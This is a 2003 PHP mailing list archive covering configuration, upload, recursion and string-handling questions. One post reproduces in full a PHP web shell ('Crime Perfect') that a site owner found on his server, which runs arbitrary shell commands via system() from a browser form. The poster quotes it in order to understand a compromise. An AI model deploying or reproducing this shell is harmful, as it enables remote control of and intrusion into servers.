ext/oci8/oci8.lo --- Peter Donahue Ciena Corp [EMAIL PROTECTED] 978-489-2116 -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] Portability of Php across Solaris systems
I successfully built Php 4.3.3 on Solaris for apache with ora8 support. I noticed that the .reg files in php/lib/.registry have hardcoded pathnames to the php files. I want to be able to take the php files (along with the apache files) and install them on a different Solaris system, possibly in a different directory. Will I be able to do this, or will the hardcoded paths prevent this? I haven't seen anything in the php.ini file that appears to help here. Thanks Peter -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] safe_mode problem
I can't seem to get safe_mode working the way I need it to. I'm trying to allow users to include PEAR from their local webspace without disabling safe_mode. The docs tell me to simply use the safe_mode_include_dir directive, but php does not seem to be using it. Here's my config, set up in httpd.conf: Directory ~ /*/WWW AllowOverride FileInfo Indexes AuthConfig Limit Options MultiViews +Indexes -FollowSymLinks +SymLinksIfOwnerMatch +ExecCGI +IncludesNoExec Limit GET POST OPTIONS PROPFIND Order allow,deny Allow from all /Limit Limit PUT DELETE PATCH PROPPATCH MKCOL COPY MOVE LOCK UNLOCK Order deny,allow Deny from all /Limit php_admin_flag safe_mode On php_value include_path .:/pkgs/php-4.2.3/share/pear php_admin_value safe_mode_exec_dir /pkgs/www/cgi-bin/ php_admin_value safe_mode_include_dir .:/pkgs/php-4.2.3/share/pear php_admin_value doc_root . php_admin_value user_dir WWW php_admin_flag engine On php_value max_execution_time 90 /Directory Currently, this setup throws SAFE MODE Restriction in effect errors when I try to include /pkgs/php-4.2.3/share/pear. Includes work when I turn safe_mode off. Anyone see what I'm doing wrong or what I should be doing differently? Peter -- Peter Torraca Webmaster, Math Department Purdue Univ., Math 813 765-494-9998 -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] non-php issue
You guys running Linux sure are cocky about these sorts of things. I have no doubt that Linux' time will come, and then it will be the MacOS X users, or FreeBSD users, or [insert random-os-that-still-remains-under-the-radar here] users that think they are untouchable. If Linux enjoyed the same type of (often less-than-computer-literate) user base that Windows does, there'd be plenty for virus writers and vulnerability exploiters to do. Linux is not necessarily more secure... just not a honeypot of large numbers of gullible users. But that's just my 2 cents (for which I will almost certainly earn the title of troll). - Original Message - From: andu [EMAIL PROTECTED] To: Raditha Dissanayake [EMAIL PROTECTED] Cc: Wang Feng [EMAIL PROTECTED]; [EMAIL PROTECTED] Sent: Sunday, September 21, 2003 10:46 PM Subject: Re: [PHP] non-php issue On Monday, September 22, 2003, at 12:34 AM, Raditha Dissanayake wrote: You can fix all of your problems by formatting your computer and installing a linux distribution. I'm getting all these security patches in my email from Microsoft Corporation lately, maybe you want to use them since I run linux and have no use for them :). Wang Feng wrote: hi everyone, could someone recommend a security mailing list, please? or you may like to answer my question below: i'm currently using outlook express 6 on WinXP Pro, and something strange happened: everytime when i start the computer, some messages pop up and attempts to sending the replies of the emails (in the inbox) in behalf of me. my anti-virus software doesn't work at all. what's the problem. how can i fix it? please help cheers, feng -- http://www.radinks.com/upload Drag and Drop File Uploader. -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] non-php issue
Not saying that there aren't lots of reasons to like and run Unix. I run FreeBSD as my webserver, for instance, because I think its the right OS for the job. I run WinXP on my desktop, though, because it has the applications I want to use, is familiar and comfortable to me, and I have the hardware to make it an enjoyable experience. I run the dreaded Outlook Express, and I (usually) love the integration present in Windows. Sure, that integration makes it easier to do stoopid things, but remember it's people that kill people, not guns. Because I use FreeBSD, I know a lot of BSD gurus--you know the type: long hair, longer beard, eyes that look like pissholes in the snow. You should hear what these guys have to say about Linux. It's just a big daisy-chain of supposed superiority. I'm not trying to stand on a soap box and defend Windows... I just think that mocking others for using what they like/know/have is not a good idea, whether it's Windows, Linux, BSD, whatever. And in this case, mocking someone who has AIDS is probably not as useful as helping him to prevent spreading it, which is sorta what he was asking (IINM). Though this is probably not the venue for his question... Cheers, Pete. - Original Message - From: Robert Cummings [EMAIL PROTECTED] To: Raditha Dissanayake [EMAIL PROTECTED] Cc: Peter James [EMAIL PROTECTED]; PHP-General [EMAIL PROTECTED] Sent: Sunday, September 21, 2003 11:08 PM Subject: Re: [PHP] non-php issue On Mon, 2003-09-22 at 01:09, Raditha Dissanayake wrote: relax guys, I have been dying to say You can fix all of your problems by formatting your computer and installing a linux distribution. On this list for ages :-) but the fact remains that an out of the box installation of any of the linux distros are far more secure than anything putout by that redmond company. All security advantages aside, I prefer linux because everytime I install a new program or service I don't need to reboot :) Cheers, Rob. -- .. | InterJinn Application Framework - http://www.interjinn.com | :: | An application and templating framework for PHP. Boasting | | a powerful, scalable system for accessing system services | | such as forms, properties, sessions, and caches. InterJinn | | also provides an extremely flexible architecture for | | creating re-usable components quickly and easily. | `' -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] non-php issue
Hey, man. This is NOT AIDS. Oh, sorry... wrong list. :-) -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] pdf2txt or rtf
I am looking for a php class which is able to read a pdf file and dump the content in txt or rtf format file. Any solutions? Regards -- Peter Rinab eHelp24 Allescherstrasse 32 81479 München Tel.: +49/89/74909-445 Fax.:+49/89/74909-351 Mobil: +49/171/4222676 www.eHelp24.com -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] some kind of redirection (not the header function)
I thought that maybe with some Apache stuff, but I dont think there something that will help, since directives such as RedirectMatch, etc. rewrite the URL, and I dont want that, I want the URL to remain http://www.domain.com/directoryX/whatever.php mod_rewrite allows you to do internal redirects. This would keep your user's URL the same, but actually point to a different page internally. This is, of course, depends on whether you or your host have mod_rewrite installed. -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] Brainiacs please help! PostgreSQL and foreach() problem
I have a database full of names. each name could be linked to any number of
sub-names, each sub-name could be linked to any number of sub-sub-names, to
infinity (unlikely but possible).
I need to iterate through this nest of names starting with a main name; lets
call the main name Peter. Peter could have John, Tim Mike working for him.
Tim could have Greg working for him.
function select_names($current_top_name){
global $dbh;
$sql =
SELECT
name_id_fk
FROM
name_relation
WHERE
top_name_id_fk = '.$current_top_name.'
;
$rs = pg_query($dbh, $sql);
if(($num_rows = pg_num_rows($rs)) 0){
for($i=0;$i$num_rows;$i++){
$row = pg_fetch_row($rs, $i, PGSQL_ASSOC);
$associated_names[] = $row['name_id_fk'];
}
pg_free_result($rs);
} // end if(($num_rows = pg_num_rows($rs)) 0)
return $associated_names;
} // end function select_names()
$current_top_name = 'Peter';
while(!$stop){
$assoc_names = select_names($current_top_name);
foreach($assoc_names as $key = $val){
print($val);
$more_assoc_names = select_names($val);
if($more_assoc_names){
ARG HELP IM NOT SMART ENOUGH
}
} // end while(!$stop)
} // end foreach($assoc_names as $key = $val)
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] PHP Interview questions
Even better than questions, make a one or two hour case study. Have them demonstrate their ability. 1. How would you solve X problem? 2. What do you think about Y? 3. Write some code to solve Z? A good place for ideas for case studies might be codewalkers, weberdev, or php-editors. There's a big difference between talking and walking. My 2 cents. -- Peter James Editor-in-Chief, php|architect Magazine [EMAIL PROTECTED] php|architect The Magazine for PHP Professionals http://www.phparch.com - Original Message - From: Micheal Harris [EMAIL PROTECTED] To: [EMAIL PROTECTED] Sent: Tuesday, August 26, 2003 9:22 AM Subject: [PHP] PHP Interview questions Hello All, I am in the process of hiring someone that needs to have extensive PHP and MySQL experience. Does anyone have any suggestions for interview questions? I have no PHP or MySQL experience, and come from a non-technical background. I want the questions to be technical, but I am unsusre as to how specific I should get with the questionning! Thanks for any help, Mike P.S - Replies can be sent directly to this address if seen as more apporpriate, as oppposed to sending it to the whole list. _ MSN 8 with e-mail virus protection service: 2 months FREE* http://join.msn.com/?page=features/virus -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] auto_prepend_file
Check out php_admin_value, highlighted in the link below http://216.239.33.104/search?q=cache:mpDXuwrDs_gJ:www.php.net/configuration.changes+php_admin_value+site:www.php.nethl=enie=UTF-8 -- Peter James Editor-in-Chief, php|architect Magazine [EMAIL PROTECTED] php|architect The Magazine for PHP Professionals http://www.phparch.com - Original Message - From: Dennis Gearon [EMAIL PROTECTED] To: [EMAIL PROTECTED] Sent: Friday, August 22, 2003 8:39 PM Subject: [PHP] auto_prepend_file Is there any settings that will silently disable the ability for a .htaccess file to use the php_value auto_prepend_value some file name directive? Some safe mode thing, or an ini setting or something? The people at the host I'm at just CAN'T seem to get it working on my site. It's an ensim site. I have errors turned on, and it doesn't even give an error. It's like the line doesn't exist. If I had a browning light with some sabotted tungsten carbide slugs, I'd fix the G*^(*^N server, after three days of messing with this. :-) -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] OT-Re: worm on th list
As an aside... I wonder what the ratio is of emails *from* the virus vs. emails *about* the virus. The latter certainly doesn't help the impulse response of the attack. :-) -- Peter James Editor-in-Chief, php|architect Magazine [EMAIL PROTECTED] php|architect The Magazine for PHP Professionals http://www.phparch.com -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] virus on the list
Here's your reason: ... the variation on the latest version [of SoBig] means that anyone who has a well-publicized email address is getting inundated. Previous versions simply went through Outlook addressbooks and sent the virus on (while also attaching another email address on as the return address). This version also looks through the victim's cached webpages, so any email address found on websites that many people visit have discovered that their getting hundreds or thousands of virus emails. -- Peter James Editor-in-Chief, php|architect Magazine [EMAIL PROTECTED] php|architect The Magazine for PHP Professionals http://www.phparch.com - Original Message - From: [EMAIL PROTECTED] To: [EMAIL PROTECTED] Sent: Thursday, August 21, 2003 1:04 AM Subject: [PHP] virus on the list what is happening why am i keep getting these from php ppl ? i have recieved them from rasmus and anyone with a php.net domain aswell as from ppl on the list is there a virus on the list server? -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Help with parse error
Can you give us a couple lines either side of this? This could be due to a
missing semicolon on the previous line.
--
Peter James
Editor-in-Chief, php|architect Magazine
[EMAIL PROTECTED]
php|architect
The Magazine for PHP Professionals
http://www.phparch.com
- Original Message -
From: James Johnson [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Sent: Wednesday, August 20, 2003 1:07 AM
Subject: [PHP] Help with parse error
Hi,
I'm trying to figure out this error I'm getting in my code:
Parse error: parse error in /home/.paco/campuscb/AdPayment.php on line 9
This is the code on line 9:
$sDate = date('Y-m-d',time());
Does this look valid?
Thanks,
James
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] uploading binary files, getting corrupt
I've problems uploading binary files via POST. They get corrupt. As told on this pag: http://se2.php.net/features.file-upload in the comments there are some walkarounds for this, but I can't found thoose rows to edit in the apache config. Sol 1: Your binary files may be uploaded incorrectly if you use modules what recode characters. For example, for Russian Apache, you should use Files ScriptThatReceivesUploads.php CharsetDisable On /Files I've tried to add this in the very bottom of the apahe config file but when I then restart apache, I get an error for this. If you're using Apache 2, you may have to comment out the following lines in your Apache config SetOutputFilter PHP SetInputFilter PHP With these in, my binary files were incorrectly uploaded I'cant find theese rows in the apache config file. Anyone have another solution for this problem? -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] error in apache log
I got alot of this error in my apache log, how do I fix it? [warn] Cannot get media type from 'application-x-httpd-php' -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] error in apache log
How to fix, where's the problem? Marek Kilimajer [EMAIL PROTECTED] skrev i meddelandet news:[EMAIL PROTECTED] Should be application/x-httpd-php. I bet you have this mistake in your apache config files. Peter Berglund wrote: I got alot of this error in my apache log, how do I fix it? [warn] Cannot get media type from 'application-x-httpd-php' -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] getting corrupt files after upload in php/apache
I'm getting corrupt files after I've used my upload-script. For images it works good but when I upload an wav-file , 222KB, the file gets corrupt and I can't play it. Whats the problem ? -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] getting corrupt files after upload in php/apache
since it works with other files I think that it's some configuration somewhere that is wrong, this is the form head: FORM ENCTYPE=multipart/form-data name='spara' method='post' action='filadmin.php' and the copycode: copy($_FILES['img1']['tmp_name'], $ufolder.$_FILES['img1']['name']) Jay Blanchard [EMAIL PROTECTED] skrev i meddelandet news:[EMAIL PROTECTED] [snip] I'm getting corrupt files after I've used my upload-script. For images it works good but when I upload an wav-file , 222KB, the file gets corrupt and I can't play it. Whats the problem ? [/snip] agh Uh, your code? Your server? -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] string concatenation from array
Of course, in this case, it would be much easier replace all of the above
with
echo join(' ', $search_string);
and be done with it. :-)
--
Peter James
Editor-in-Chief, php|architect Magazine
[EMAIL PROTECTED]
php|architect
The Magazine for PHP Professionals
http://www.phparch.com
- Original Message -
From: Peter James [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Sent: Tuesday, August 12, 2003 2:18 PM
Subject: Re: [PHP] string concatenation from array
My personal favourite is to use an array. It's much cleaner syntax
IMO...it
is very easy to miss a '.' on a '.=', and introduce a nasty bug.
$wresult = array();
foreach ($search_string as $word_result) {
$wresult[] = $word_result;
}
echo join('', $wresult);
or in php 4.3
echo join($wresult);
--
Peter James
Editor-in-Chief, php|architect Magazine
[EMAIL PROTECTED]
php|architect
The Magazine for PHP Professionals
http://www.phparch.com
- Original Message -
From: Matt Giddings [EMAIL PROTECTED]
To: 'Micah Montoy' [EMAIL PROTECTED]; [EMAIL PROTECTED]
Sent: Tuesday, August 12, 2003 2:00 PM
Subject: RE: [PHP] string concatenation from array
Use the . concatenation operator. : )
$wresult = ;
foreach ($search_string as $word_result) {
$wresult = $wresult . . $word_result;
}
echo $wresult;
Matt
-Original Message-
From: Micah Montoy [mailto:[EMAIL PROTECTED]
Sent: Tuesday, August 12, 2003 3:58 PM
To: [EMAIL PROTECTED]
Subject: [PHP] string concatenation from array
I'm having a bit of difficulty getting a string to attach to itself
from
an
array. Here is the bit of code I'm working on.
$wresult = ;
foreach ($search_string as $word_result){
$wresult = $wresult $word_result;
}
echo ($wresult);
Anyone see why when I run through each part of the array, it won't
attach
the next string and so on?
thanks
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
---
Incoming mail is certified Virus Free.
Checked by AVG anti-virus system (http://www.grisoft.com).
Version: 6.0.507 / Virus Database: 304 - Release Date: 8/4/2003
---
Outgoing mail is certified Virus Free.
Checked by AVG anti-virus system (http://www.grisoft.com).
Version: 6.0.507 / Virus Database: 304 - Release Date: 8/4/2003
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] how to use array_map() with a class callback function?
array_map(array('Maker', 'sGetNameId'), array(1) )
Have a look at the callback type, here:
http://www.php.net/manual/en/language.pseudo-types.php
--
Peter James
Editor-in-Chief, php|architect Magazine
[EMAIL PROTECTED]
php|architect
The Magazine for PHP Professionals
http://www.phparch.com
- Original Message -
From: Jean-Christian IMbeault [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Sent: Wednesday, August 13, 2003 12:33 AM
Subject: [PHP] how to use array_map() with a class callback function?
I'd like to use array map with the callback function being a static
function in a class. How can I do that?
I have tried:
class Maker {
function sGetNameId($a) {
return 1;
}
}
array_map(Maker::sGetNameId, array(1) )
But I get this error:
array_map(): The first argument, 'Maker::sGetNameId', should be either
NULL or a valid callback
Is it possible to use class functions as callback functions?
Thanks,
Jean-Christian Imbeault
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] string concatenation from array
My personal favourite is to use an array. It's much cleaner syntax IMO...it
is very easy to miss a '.' on a '.=', and introduce a nasty bug.
$wresult = array();
foreach ($search_string as $word_result) {
$wresult[] = $word_result;
}
echo join('', $wresult);
or in php 4.3
echo join($wresult);
--
Peter James
Editor-in-Chief, php|architect Magazine
[EMAIL PROTECTED]
php|architect
The Magazine for PHP Professionals
http://www.phparch.com
- Original Message -
From: Matt Giddings [EMAIL PROTECTED]
To: 'Micah Montoy' [EMAIL PROTECTED]; [EMAIL PROTECTED]
Sent: Tuesday, August 12, 2003 2:00 PM
Subject: RE: [PHP] string concatenation from array
Use the . concatenation operator. : )
$wresult = ;
foreach ($search_string as $word_result) {
$wresult = $wresult . . $word_result;
}
echo $wresult;
Matt
-Original Message-
From: Micah Montoy [mailto:[EMAIL PROTECTED]
Sent: Tuesday, August 12, 2003 3:58 PM
To: [EMAIL PROTECTED]
Subject: [PHP] string concatenation from array
I'm having a bit of difficulty getting a string to attach to itself
from
an
array. Here is the bit of code I'm working on.
$wresult = ;
foreach ($search_string as $word_result){
$wresult = $wresult $word_result;
}
echo ($wresult);
Anyone see why when I run through each part of the array, it won't
attach
the next string and so on?
thanks
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
---
Incoming mail is certified Virus Free.
Checked by AVG anti-virus system (http://www.grisoft.com).
Version: 6.0.507 / Virus Database: 304 - Release Date: 8/4/2003
---
Outgoing mail is certified Virus Free.
Checked by AVG anti-virus system (http://www.grisoft.com).
Version: 6.0.507 / Virus Database: 304 - Release Date: 8/4/2003
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] how to change index.php?passwd to index.php in the address bar
Use the post method? -- Peter James Editor-in-Chief, php|architect Magazine [EMAIL PROTECTED] php|architect The Magazine for PHP Professionals http://www.phparch.com - Original Message - From: murugesan [EMAIL PROTECTED] To: Robert Cummings [EMAIL PROTECTED]; Kris Reid [EMAIL PROTECTED] Cc: PHP List [EMAIL PROTECTED] Sent: Wednesday, August 13, 2003 12:28 AM Subject: [PHP] how to change index.php?passwd to index.php in the address bar Hello all, When go to a new page from login page the address bar has localhost/regsuccess.php?password=ASD I don't want the things that comes after ? in the URL How can I resolve this issue?. Thanks in advance, Murugesan -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Calling to a page without having to load it
Make your request, but send a 204 HTTP response header back. http://ppewww.ph.gla.ac.uk/~flavell/www/status204/results.html -- Peter James [EMAIL PROTECTED] php|architect The Magazine for PHP Professionals http://www.phparch.com - Original Message - From: Creative Solutions New Media [EMAIL PROTECTED] To: [EMAIL PROTECTED] Sent: Thursday, August 07, 2003 9:50 PM Subject: [PHP] Calling to a page without having to load it Hello, I have a weird problem I was hoping someone could help with. I have a client who hosts a site on a standard server (No PHP et all) Currently he has some Flash based content. Within the Flash content I can call to PHP pages in another domain to push and pull data from a mySQL DB into the Flash App (Basically what I am doing is tracking page hits within the flash movie). However, now there are going to be some standard HTML pages as well (no Flash). I would like to be able to integrate the tracking system to record hits on those pages as well. Is there a way to do this externally (to launch a PHP script on another server without actually have to load a PHP page). I know this is a bit of a weird thing but if anyone has a suggestion (beyond telling the customer to spring for PHP access himself) I would appreciate it very much. Thanks. Tim Winters Manager, Creative Development Sampling Technologies Incorporated (STI) [EMAIL PROTECTED] [EMAIL PROTECTED] W: 902 450 5500 C: 902 430 8498 -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Flash Actionscript List or Forum
Not sure about a list, but this site has a boatload of tutorials and answered lots of questions that I had. http://actionscript.org/tutorials.shtml -- Peter James [EMAIL PROTECTED] php|architect The Magazine for PHP Professionals http://www.phparch.com - Original Message - From: Joe Harman [EMAIL PROTECTED] To: [EMAIL PROTECTED] Sent: Friday, August 08, 2003 1:08 AM Subject: [PHP] Flash Actionscript List or Forum Hello all, I've been doing PHP for a little while now... I am starting learn Action Script now... and having trouble with global variables and functions... does anyone know where I find a good list or forum for action script? Joe Harman http://www.HarmanMedia.com I used to think I was indecisive, but now I'm not so sure. - Joe Harman, 2003 -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Possible My Website was hacked... with PHP... please tell me what this is???
Via:
http://www.google.ca/search?q=Crime+Perfect+2003ie=UTF-8oe=UTF-8hl=enmeta=
Found:
http://www.zone-h.org/
Search:
Crime Perfect
See:
Results (doesn't look good)
:-(
--
Peter James
[EMAIL PROTECTED]
php|architect
The Magazine for PHP Professionals
http://www.phparch.com
- Original Message -
From: Joe Harman [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Sent: Thursday, July 31, 2003 12:06 AM
Subject: [PHP] Possible My Website was hacked... with PHP... please tell me
what this is???
I found this on my server... I have no idea what it is... can someone
tell me what it does...
Thanks
--
html head
titlePHP Shell - CP/title
/head
body bgcolor=#FF text=#33 link=#00 vlink=#00
alink=#00
h1 align=centerfont size=+4 face=verdanaCrime
Perfect/fontbr
font face=Tahoma size=+1PHP Shell - by _m4st3r_c0d3/font/h1
?php
/* First we check if there has been asked for a working directory. */
if (isset($work_dir)) {
/* A workdir has been asked for - we chdir to that dir. */
chdir($work_dir);
$work_dir = exec(pwd);
} else {
/* No work_dir - we chdir to $DOCUMENT_ROOT */
chdir($DOCUMENT_ROOT);
$work_dir = $DOCUMENT_ROOT;
}
?
form name=myform action=?php echo $PHP_SELF ? method=post
pbDiretoacute;rio em que vocecirc; estaacute; no momento:
?php
$work_dir_splitted = explode(/, substr($work_dir, 1));
echo a href=\$PHP_SELF?work_dir= . urlencode($url) . /command= .
urlencode($command) . \Root/a/;
if ($work_dir_splitted[0] == ) {
$work_dir = /; /* Root directory. */
} else {
for ($i = 0; $i count($work_dir_splitted); $i++) {
/* echo i = $i;*/
$url .= /.$work_dir_splitted[$i];
echo a href=\$PHP_SELF?work_dir= . urlencode($url) . command= .
urlencode($command) . \$work_dir_splitted[$i]/a/;
}
}
?
/b/p
pbEscolha abaixo o diretoacute;rio em que deseja ir:/b/p
select name=work_dir onChange=this.form.submit()
?php
/* Now we make a list of the directories. */
$dir_handle = opendir($work_dir);
/* Run through all the files and directories to find the dirs. */
while ($dir = readdir($dir_handle)) {
if (is_dir($dir)) {
if ($dir == .) {
echo option value=\$work_dir\ selectedCurrent
Directory/option\n;
} elseif ($dir == ..) {
/* We have found the parent dir. We must be carefull if the parent
directory is the root directory (/). */
if (strlen($work_dir) == 1) {
/* work_dir is only 1 charecter - it can only be / */
} elseif (strrpos($work_dir, /) == 0) {
/* The last / in work_dir were the first charecter.
This means that we have a top-level directory
eg. /bin or /home etc... */
echo option value=\/\Parent Directory/option\n;
} else {
/* We do a little bit of string-manipulation to find the parent
directory... Trust me - it works :-) */
echo option value=\. strrev(substr(strstr(strrev($work_dir), /),
1)) .\Parent Directory/option\n;
}
} else {
if ($work_dir == /) {
echo option value=\$work_dir$dir\$dir/option\n;
} else {
echo option value=\$work_dir/$dir\$dir/option\n;
}
}
}
}
closedir($dir_handle);
?
/select
pbDigite abaixo os comandos que deseja executar:/b/p
input type=text name=command size=60 ?php if ($command) { echo
value=\$command\;} ? input name=submit_btn type=submit
value=Execute Command/p
pLigar/Ativar codestderr/code-trapping?
input type=checkbox name=stderr/p
pbAbaixo, terminal onde apareceraacute; os resultados dos comandos
que
vocecirc; executou/b/p
p
textarea cols=80 rows=20 readonly
?php
if ($command) {
if ($stderr) {
system($command . 1 /tmp/output.txt 21; cat /tmp/output.txt; rm
/tmp/output.txt);
} else {
system($command);
}
}
?
/textarea
/p
/form
pbCrime Perfect 2003 /b/p
pbBy _m4st3r_c0d3 - #crimeperfect/b/p
/div
/body
/html
Joe Harman
http://www.HarmanMedia.com
Only two things are infinite, the universe and human stupidity, and I'm
not sure about the former. - Albert Einstein
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
RE: [PHP] formating date
-Original Message- My script currently works; printing the date that it extracts from mysql table. It prints the date as: 2004-01-29 $mailed=$row[mailed]; $payment=$row[payment]; $ID=$row[ID]; echo TRTD$mailed/TDTD$payment/TD/TR; I'm trying to change the format so that the date appears as: January 29, 2004 $mailed=$row[mailed]; $payment=$row[payment]; $ID=$row[ID]; $thisdate=date(F/d/Y,$row-mailed); echo TRTD$thisdate/TDTD$payment/TD/TR; This gives the right format, however, it seems to be trying to do the current date rather then my submitted date? Any idea how I do this? Try this: $mailed=$row[mailed]; $payment=$row[payment]; $ID=$row[ID]; $Timestamp=strtotime($row[mailed]); $thisdate=date(F/d/Y,$Timestamp); echo TRTD$thisdate/TDTD$payment/TD/TR; Before you can use date with a string I believe you have to get the timestamp from your string and then use that to format date. Peter -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] debuging and getting mor information about failures
These errors are usually caused by an extra or missing brace or quote/apostrophe/backtick. The best way to find where this is happening is to use another error. Start at the bottom of your script and introduce some garbage on a line by itself. asdf for example. This should cause a parse error when encountered. Move this up a few lines at a time, until the original parse error goes away, and this one starts. This will help you identify where your problem is. This is a very frustrating error message, but the above should take some of the pain away. :-) HTH. Pete. -- -- Peter James [EMAIL PROTECTED] php|architect The Magazine for PHP Professionals http://www.phparch.com chrstian brensteiner [EMAIL PROTECTED] wrote in message news:[EMAIL PROTECTED] whats the best option to get more information about a failure in your sorce code ? whenever i get failures that are situated at the very end of my script how do i get to know wherer they start? now i have get from apache + php this return Parse error: parse error, unexpected $ in c:\programme\easyphp\www\cms\procede_presse.php on line 268 268 is the last line of my script how to deal with those failures in an intelligent way? -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Fw: [PHP] debuging and getting mor information about failures
Just forwarding this reply back to the list. - Original Message - From: Chris W. Parker [EMAIL PROTECTED] To: Peter James [EMAIL PROTECTED] Sent: Tuesday, July 29, 2003 10:26 AM Subject: RE: [PHP] debuging and getting mor information about failures Peter James mailto:[EMAIL PROTECTED] on Tuesday, July 29, 2003 9:18 AM said: These errors are usually caused by an extra or missing brace or quote/apostrophe/backtick. The best way to find where this is happening is to use another error. [snip] This is a very frustrating error message[snip] It also helps to learn what to look out for. Not to say that I won't ever have the need, but I've never needed to deliberately introduce one error just to find another one, especially when it's a syntax error. The best thing to do is just get used to scanning your lines of code for proper syntax. Make sure you always have a ; at the end of each statement, make sure your curly braces line up, etc. Another thing that be making this error difficult for you to find is because of your coding style. Your code could possibly be written in such a way that it doesn't make scanning it too easy therefore making it hard to find such tiny errors. hth, chris. -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Curl alternative?
You can do anything (almost) with fopen() and fsockopen()... but it won't necessarilybe easy. It depends what you want to do. -- Peter James [EMAIL PROTECTED] php|architect The Magazine for PHP Professionals http://www.phparch.com - Original Message - From: Steven Kallstrom [EMAIL PROTECTED] To: [EMAIL PROTECTED] Sent: Tuesday, July 29, 2003 10:46 AM Subject: [PHP] Curl alternative? Dear List, I am currently working on a UPS Web Service Interface and was wondering if you thought that I could accomplish such a thing without the Curl libraries. since unfortunately the server that I am using did not compile Curl with PHP. what do you think. is this something that is possible.? Or should I just stick with perl or java. any suggestions. thanks, I appreciate any help in advance. Steven Kallstrom -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] DB resource as Session var
